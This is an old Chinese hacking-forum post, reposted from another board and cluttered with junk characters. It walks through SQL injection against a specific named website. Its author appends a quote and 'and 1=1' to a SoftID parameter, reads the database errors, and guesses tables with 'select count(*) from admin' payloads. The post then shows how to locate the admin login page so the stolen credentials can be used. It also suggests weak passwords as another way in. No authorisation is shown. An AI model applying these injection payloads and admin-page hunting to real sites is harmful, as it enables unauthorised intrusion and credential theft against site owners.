- 在线时间
- 0 小时
- 最后登录
- 2007-9-23
- 注册时间
- 2004-9-10
- 听众数
- 3
- 收听数
- 0
- 能力
- 0 分
- 体力
- 9975 点
- 威望
- 7 点
- 阅读权限
- 150
- 积分
- 4048
- 相册
- 0
- 日志
- 0
- 记录
- 0
- 帖子
- 1893
- 主题
- 823
- 精华
- 2
- 分享
- 0
- 好友
- 0
我的地盘我做主
该用户从未签到
 |
作者:枫三少 转自:黑基bbs原创作品版' T8 S8 f" Y$ {/ |8 F
7 |, ^- l$ e9 B' _) \
有很多人问过我这个问题。老是听说,看到文章里谁谁谁怎么分析别人的代码怎么来入侵的。那么怎么找代码呢?: k- m: |! s( @; @& ]
' x6 P( M' ]+ p分析代码,首先你得有源代码。如果找源代码呢?呵呵,假如是分析DV的,就下一个DV的来,看看他的代码。# N( i" ], u4 [; A' n# f5 U; @3 M* h
! P! a# j/ ~1 M; p
在实战中往往因为时间的愿意我们采用的还有从HTML代码入手。
$ V# d( h' X2 O5 n" Y5 {5 y, Y* o2 n& F2 [
这里我简单的介绍一个过程吧。& N' y* u! K) F) r8 o! ?- k& I- b
& \; Q) _/ S, d
首先我找到一个网站,是我们基地首页有连接的/ O0 W& A+ q- F+ Q6 |- s# h$ \
http://www.16china.com/hack/
& B( N: h0 {/ |+ h8 R2 M T; h
随便选择一个分页:
1 m6 W. p6 R+ c' n! [: g# Mhttp://www.16china.com/hack/SoftView.Asp?SoftID=139; q+ d' s$ Q7 D. v
典型的ASP。看看能不能注射
& X1 ?5 |+ U& S# shttp://www.16china.com/hack/SoftView.Asp?SoftID=139'3 e% ~) \% a% M
返回:
3 H% A6 W1 C% a! X, D* R& ~7 Z2 {Microsoft VBScript 编译器错误 错误 '800a03f6'
) }, R. D# E5 c- p' M: p0 X q2 h' N% v; ^( {
缺少 'End'
7 B6 ~: [# J& K* Q B
5 a0 ]# V6 w1 X( z* V* L/iisHelp/common/500-100.asp,行242
) \' O! A; P- f; p* z9 T$ K! x
% F5 A) ?+ l( g, U# |Microsoft JET Database Engine 错误 '80040e14' 9 _0 R( ^, N' c
! |' n# W: Y& Y2 p" H7 R/ K" h7 n8 P4 {字符串的语法错误 在查询表达式 'SoftInfo.CateID=Category.CateID and SoftInfo.SubID=SubCate.SubID and SoftInfo.SoftID=139'' 中。 5 Y" { n1 @4 E; Q5 D
. c1 f/ Q# |$ Y' @3 X
/hack/SoftView.Asp,行17
+ r0 Q# H; z' B Z# e4 ]) \' o再来:1 e6 a) b6 z' ^! c
http://www.16china.com/hack/SoftView.Asp?SoftID=139%20and%201=1% F& W4 S* c' z G0 i7 }
返回正常网页。
6 P' p' b) a5 x {
! X0 Q v- W- }0 U' B" s4 G提交:5 C8 |& J z- A' i/ p" Y. c2 U( t
http://www.16china.com/hack/Soft ... %20(select%20count(*)%20from%20admin)>=0
4 @9 r. T. ?4 ^0 @' K4 a* \7 G. C0 x2 u* o8 E
返回正常页/
9 d) c) w8 M! w! ~* v) B/ Z: ~8 mhttp://www.16china.com/hack/Soft ... %20(select%20count(*)%20from%20article)>=0
, [- V% ?, k) y- D: Q& t+ o8 j# ], k1 U: V6 _
同样正常。
' i: S1 e. Y, }. S# L% _0 P5 q( P5 J* y) {. _& k
http://www.16china.com/hack/Soft ... )%20from%20article)>=0
. T) M# x7 I! r" y; v+ B0 q6 I- m7 M7 _* _- D7 f+ ^
……
* ?- k4 r0 H7 h$ y( O' K& z4 X7 U6 V- s1 ]0 r- M( S( B, `
象上面这样我们就可以成功注射网站。那么在拿到管理员帐号密码后如何找后台7 i+ E7 Q5 R |. T# q; Y
按以往的经验我采用:
# }: ]3 @6 j, r2 k8 j# v6 M- w# l. Fhttp://www.16china.com/hack/admin /*这里的”ADMIN“可以用LOGIN等替换*/
* ^+ D1 X) V$ F* V2 Q7 o) Z' S我为什么不用http://www.16china.com/hack/admin.asp
! s' i; u; N9 y. bhttp://www.16china.com/hack/admin/index.asp呢?因为我不知道他文件夹里的东西有没有被修改。如果存在ADMIN文件夹,但是并不是常用首页的话IE将返回如“你没有权限浏览网页……”等信息,一般来说我们可以确定后台就在那里。
, Y& w: b# m) N9 u p) N( Rhttp://www.16china.com/hack/admin返回信息:
, M2 ?! q, t- i, F- I5 I! r+ f错误提示信息!
* M* q% q) I. R: u0 j. q& X( s 产生错误的可能原因:
9 M7 k, a' D1 u9 o7 ? H0 m1 M) e9 r" C1 U* v7 S+ T: n
3 | o- `1 ?* L7 S; ~( X
您没有进入本页面的权限!本次操作已被记录!
- f: m, ?3 m. k0 j. y# J可能您还没有登陆或者不具有使用当前功能的权限!请联系管理员.6 b* {' b+ j* p" F* u
本页面为[管理员]专用,请先登陆后进入.
. j9 M `- ^5 c) K+ W
3 [: P0 \) G f返回上一页... /*说明登陆URL为常用的如:index.asp...*/ e8 ? D e$ u; g: ~ v
查看HTML代码:/ E' \ x8 g' h& f
<html><head><title>错误提示信息!</title>+ I- v1 m% ^; i& Y' y! `
- I0 B9 q0 N4 n' G# P$ i……
- A9 y1 Z1 ^5 @' w3 x0 f4 G7 ^% s) T3 ?( z i y q
<a href=adminlogin.asp class=meun target=_top>登陆</a>后进入.
3 ?* C2 D* c0 P) T1 u' D* Z& r) O* z6 i……2 r9 g. A$ m0 a
/ u+ `0 T2 [1 H
找到了:/ L+ L2 r5 Q% Q+ }8 s2 j5 [
http://www.16china.com/hack/admin/adminlogin.asp) ?! g" y4 B1 L9 {
- M; f+ {5 v0 n- R2 r7 F$ s/ o) e, T+ ^( e* J; C0 c/ _" T8 {
看看他的源代码告诉我们些什么:! k2 B. `/ E+ T. H& H
5 ~6 N7 ^* w& J% v1 G
<html>
n# _' g1 f# W7 r
# Q7 b3 X8 r4 @0 W! J<head>
/ i* m( L+ d4 }( u$ Y<title>管理员登陆</title>
, s" f# a$ P( T5 D; l$ p# W+ ~9 g' b y% t
……………
, f; Z# A* b* `7 o$ m
6 N! Y4 B. ?* K' w关于数据库表名这些这里不多讲,看看,如果我们输入正确的帐号密码将回进入4 G" ]0 l- c( N. R& z
http://www.16china.com/hack/admin/adminlogin.asp?action=login
3 N" d2 }8 D! ]: [) j& d这里。
# b+ q( S/ Z8 ^4 T. T' t4 c' W
- ]* c2 k) u8 P7 V+ {' c! q" X$ n只要知道了后台,我们就有很多办法,如弱口令,SQL本地执行(赢政下载系统)……
9 L/ J8 e" j9 I- j2 S+ b
6 ]5 N. H, b4 B; R9 d懂了吗?好了,时间关系加上本人技术原因就写到这里吧。不懂的可以跟贴,大家一起讨论一下:) |
zan
|
IP卡
狗仔卡
发表于 2004-10-4 00:36
转播
淘帖
分享
收藏
支持
反对
微信
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
显身卡
